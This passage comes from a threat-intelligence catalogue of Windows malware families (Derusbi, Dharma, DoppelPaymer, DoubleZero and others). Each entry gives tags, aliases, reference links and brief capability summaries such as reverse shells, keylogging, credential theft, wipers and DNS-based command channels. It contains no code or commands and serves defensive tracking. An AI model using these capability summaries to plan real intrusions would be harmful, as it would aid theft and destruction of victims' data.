Table 3333. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe

https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/

Derusbi (Windows)

A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.

The tag is: misp-galaxy:malpedia="Derusbi (Windows)"

Derusbi (Windows) is also known as:

  • PHOTO

Table 3334. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi

https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://attack.mitre.org/groups/G0096

http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf

https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf

https://www.secureworks.com/research/threat-profiles/bronze-keystone

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf

https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://www.secureworks.com/research/threat-profiles/bronze-firestone

https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

https://attack.mitre.org/groups/G0001/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/

DesertBlade

According to Microsoft, this was used in a limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller).

The tag is: misp-galaxy:malpedia="DesertBlade"

DesertBlade is also known as:

Table 3335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

Devil’s Rat

The tag is: misp-galaxy:malpedia="Devil’s Rat"

Devil’s Rat is also known as:

Table 3336. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat

Dexbia

The tag is: misp-galaxy:malpedia="Dexbia"

Dexbia is also known as:

  • CONIME

Table 3338. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia

https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf

Dexphot

Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.

The tag is: misp-galaxy:malpedia="Dexphot"

Dexphot is also known as:

Table 3339. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot

https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/

Dexter

Dexter is a computer virus or point of sale malware which infects computers running Microsoft Windows and was discovered by IT security firm Seculert, in December 2012. It infects PoS systems worldwide and steals sensitive information such as Credit Card and Debit Card information.

The tag is: misp-galaxy:malpedia="Dexter"

Dexter is also known as:

  • LusyPOS

Table 3340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter

https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html

https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware—​Getting-Your-Hands-Dirty/

http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html

https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/

Dharma

According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.

Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.

The tag is: misp-galaxy:malpedia="Dharma"

Dharma is also known as:

  • Arena

  • Crysis

  • Wadhrama

  • ncov

Table 3341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma

https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware

https://securelist.com/cis-ransomware/104452/

https://twitter.com/JakubKroustek/status/1087808550309675009

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.vice.com/en/article/wxqz54/secret-service-network-investigative-technique-ransomware

https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://www.theregister.com/2019/11/11/dharma_decryption_promises_data_recovery/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

http://web.archive.org/web/20191008053714/http://esec-lab.sogeti.com/posts/2016/06/07/the-story-of-yet-another-ransomfailware.html

https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/

https://www.justice.gov/usao-dc/press-release/file/1021186/download

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://asec.ahnlab.com/en/54937/

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

https://s3.documentcloud.org/documents/6986753/Secret-Service-Seattle-NIT-Warrant-Application.pdf

https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une

https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://www.acronis.com/en-us/articles/Dharma-ransomware/

https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/

https://www.group-ib.com/media/iran-cybercriminals/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://research.checkpoint.com/2018/the-ransomware-doctor-without-a-cure/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

DiamondFox

According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.

Once purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.

DiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.

The tag is: misp-galaxy:malpedia="DiamondFox"

DiamondFox is also known as:

  • Crystal

  • Gorynch

  • Gorynych

Table 3342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox

https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/

https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced

https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF

https://www.scmagazine.com/inside-diamondfox/article/578478/

https://blog.cylance.com/a-study-in-bots-diamondfox

http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/

DICELOADER

A RAT written in .NET, used by FIN7 since 2021. In some instances dropped by ps1.powertrash.

The tag is: misp-galaxy:malpedia="DICELOADER"

DICELOADER is also known as:

  • Lizar

Table 3344. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader

https://www.mandiant.com/resources/blog/evolution-of-fin7

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

DILLJUICE

APT10’s fork of the (open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="DILLJUICE"

DILLJUICE is also known as:

Table 3345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice

https://securelist.com/apt-trends-report-q1-2021/101967/

https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html

DilongTrash

Downloader.

The tag is: misp-galaxy:malpedia="DilongTrash"

DilongTrash is also known as:

Table 3346. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dilongtrash

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Dimnie

The tag is: misp-galaxy:malpedia="Dimnie"

Dimnie is also known as:

Table 3347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie

http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/

DinodasRAT

The tag is: misp-galaxy:malpedia="DinodasRAT"

DinodasRAT is also known as:

Table 3348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat

https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/

DinoTrain

Downloader.

The tag is: misp-galaxy:malpedia="DinoTrain"

DinoTrain is also known as:

Table 3349. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dinotrain

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

DirCrypt

The tag is: misp-galaxy:malpedia="DirCrypt"

DirCrypt is also known as:

Table 3350. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt

https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

Disk Knight

The tag is: misp-galaxy:malpedia="Disk Knight"

Disk Knight is also known as:

Table 3352. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight

https://www.lucadamico.dev/papers/malware_analysis/DiskKnight.pdf

DispenserXFS

The tag is: misp-galaxy:malpedia="DispenserXFS"

DispenserXFS is also known as:

Table 3354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs

https://twitter.com/cyb3rops/status/1101138784933085191

DistTrack

The tag is: misp-galaxy:malpedia="DistTrack"

DistTrack is also known as:

  • Shamoon

Table 3355. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf

http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html

https://securelist.com/shamoon-the-wiper-copycats-at-work/

https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/

http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2017

https://malwareindepth.com/shamoon-2012/

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/

DLRAT

The tag is: misp-galaxy:malpedia="DLRAT"

DLRAT is also known as:

Table 3358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

DMSniff

DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.

The tag is: misp-galaxy:malpedia="DMSniff"

DMSniff is also known as:

Table 3360. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff

https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/

https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d

DneSpy

DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.

The tag is: misp-galaxy:malpedia="DneSpy "

DneSpy is also known as:

Table 3361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

DNSChanger

The tag is: misp-galaxy:malpedia="DNSChanger"

DNSChanger is also known as:

Table 3362. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger

https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/

DNSMessenger

DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.

The tag is: misp-galaxy:malpedia="DNSMessenger"

DNSMessenger is also known as:

  • TEXTMATE

Table 3363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger

https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html

https://blog.talosintelligence.com/2017/03/dnsmessenger.html

DogHousePower

DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.

The tag is: misp-galaxy:malpedia="DogHousePower"

DogHousePower is also known as:

  • Shelma

Table 3366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower

http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf

Minodo

Since late February 2023, Minodo Backdoor campaigns have been employed to deliver either the Project Nemesis information stealer or more sophisticated backdoors like Cobalt Strike. This backdoor collects basic system information, which it then transmits to the C2 server. In return, it receives an AES-encrypted payload. Notably, the Minodo Backdoor is designed to contact a different C2 address for domain-joined systems. This suggests that more capable backdoors, such as Cobalt Strike, are downloaded on higher-value targets instead of Project Nemesis.

The tag is: misp-galaxy:malpedia="Minodo"

Minodo is also known as:

Table 3367. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.domino

https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/

https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor

DONOT

Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.

The tag is: misp-galaxy:malpedia="DONOT"

DONOT is also known as:

Table 3368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.donot

https://labs.k7computing.com/index.php/the-donot-apt/

https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed

donut_injector

Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42). Github: https://github.com/TheWover/donut

The tag is: misp-galaxy:malpedia="donut_injector"

donut_injector is also known as:

  • Donut

Table 3369. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector

https://thewover.github.io/Introducing-Donut/

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

DoppelDridex

DoppelDridex is a fork of Indrik Spider’s Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.

The tag is: misp-galaxy:malpedia="DoppelDridex"

DoppelDridex is also known as:

Table 3371. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/

https://redcanary.com/blog/grief-ransomware/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true

https://cyber-anubis.github.io/malware%20analysis/dridex/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays

https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware

https://twitter.com/BrettCallow/status/1453557686830727177?s=20

DoppelPaymer

Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: ".how2decrypt.txt".

The tag is: misp-galaxy:malpedia="DoppelPaymer"

DoppelPaymer is also known as:

  • Pay OR Grief

Table 3372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c

https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://twitter.com/AltShiftPrtScn/status/1385103712918642688

https://twitter.com/vikas891/status/1385306823662587905

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.ic3.gov/Media/News/2020/201215-1.pdf

https://techcrunch.com/2020/03/01/visser-breach/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/

https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html

https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/BrettCallow/status/1453557686830727177?s=20

https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding

http://www.secureworks.com/research/threat-profiles/gold-heron

https://www.secureworks.com/research/threat-profiles/gold-heron

https://sites.temple.edu/care/ci-rw-attacks/

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://redcanary.com/blog/grief-ransomware/

https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen

https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/

DOSTEALER

According to Mandiant, DOSTEALER is a dataminer that mines browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.

The tag is: misp-galaxy:malpedia="DOSTEALER"

DOSTEALER is also known as:

Table 3376. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dostealer

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Dot Ransomware

The tag is: misp-galaxy:malpedia="Dot Ransomware"

Dot Ransomware is also known as:

  • MZP Ransomware

Table 3377. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware

https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html

DOUBLEBACK

DOUBLEBACK is a newly discovered fileless malware deployed as part of an attack campaign that took place in December 2020. The threat actors responsible for the operations are tracked as UNC2529 by researchers. According to their findings, DOUBLEBACK is the final payload delivered onto the compromised systems. Its task is to establish and maintain a backdoor on the victim’s machine.

The tag is: misp-galaxy:malpedia="DOUBLEBACK"

DOUBLEBACK is also known as:

Table 3378. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html

DoubleFinger

The tag is: misp-galaxy:malpedia="DoubleFinger"

DoubleFinger is also known as:

Table 3380. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger

https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/

DoubleZero

A wiper identified by CERT-UA on March 17th, written in C#.

The tag is: misp-galaxy:malpedia="DoubleZero"

DoubleZero is also known as:

  • FiberLake

Table 3382. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html

https://cert.gov.ua/article/38088

